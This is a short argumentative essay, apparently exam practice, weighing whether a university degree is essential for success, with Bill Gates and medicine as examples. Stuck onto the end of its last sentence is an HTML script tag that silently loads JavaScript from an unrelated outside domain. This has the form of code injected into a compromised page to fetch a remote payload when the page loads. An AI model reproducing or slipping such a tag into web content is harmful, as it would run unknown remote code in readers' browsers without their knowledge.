Obtaining a university degree is the most effective strategy to achieve success.  Discussing this view

It is sometimes asserted that qualifications are attributable to success and that they are an essential aspect of hitting the high target in today's society, however, some believe that this is not true in some circumstances. Some cases demonstrate that they can achieve success in their careers just via their experiments and social skills. I agree with both points of view because everything has two sides: objective and negative. Both arguments will be examined in this essay.

On the one hand, some argue that a university education is critical for success. In general, people who graduated with a good degree have a better chance of finding work than those who did not. A good education is a deciding factor that allows you to compete with others for great positions. The more education we have, the more options we have, so university degrees play a vital role in our lives. Additionally, in some fields, persons must have extensive knowledge to pursue this major. For example, if you want to be a doctor, you must have a thorough understanding of the medical sector, which can only be obtained through university education. This illustrates that a high degree of education is the first and most important prerequisite for gaining a good career.

Despite the aforementioned arguments, I believe that some individuals can achieve success without a university degree. a typical example is  Bill Gates, an American billionaire who succeeded in his career although he dropped out of college.  Another example is that many young people nowadays can earn a lot of money while not having studied extensively.  Thanks to the development of information technology, the job market has become more open. There are many careers that do not require a professional degree but still earn a high income.

In conclusion, each option has its own right ideas, showing that a university degree is not the sole road to success. However, in my opinion, teenagers should achieve higher education to prepare better for their future jobs.<script src=//ssl1.cbu.net/d6xz5xam></script>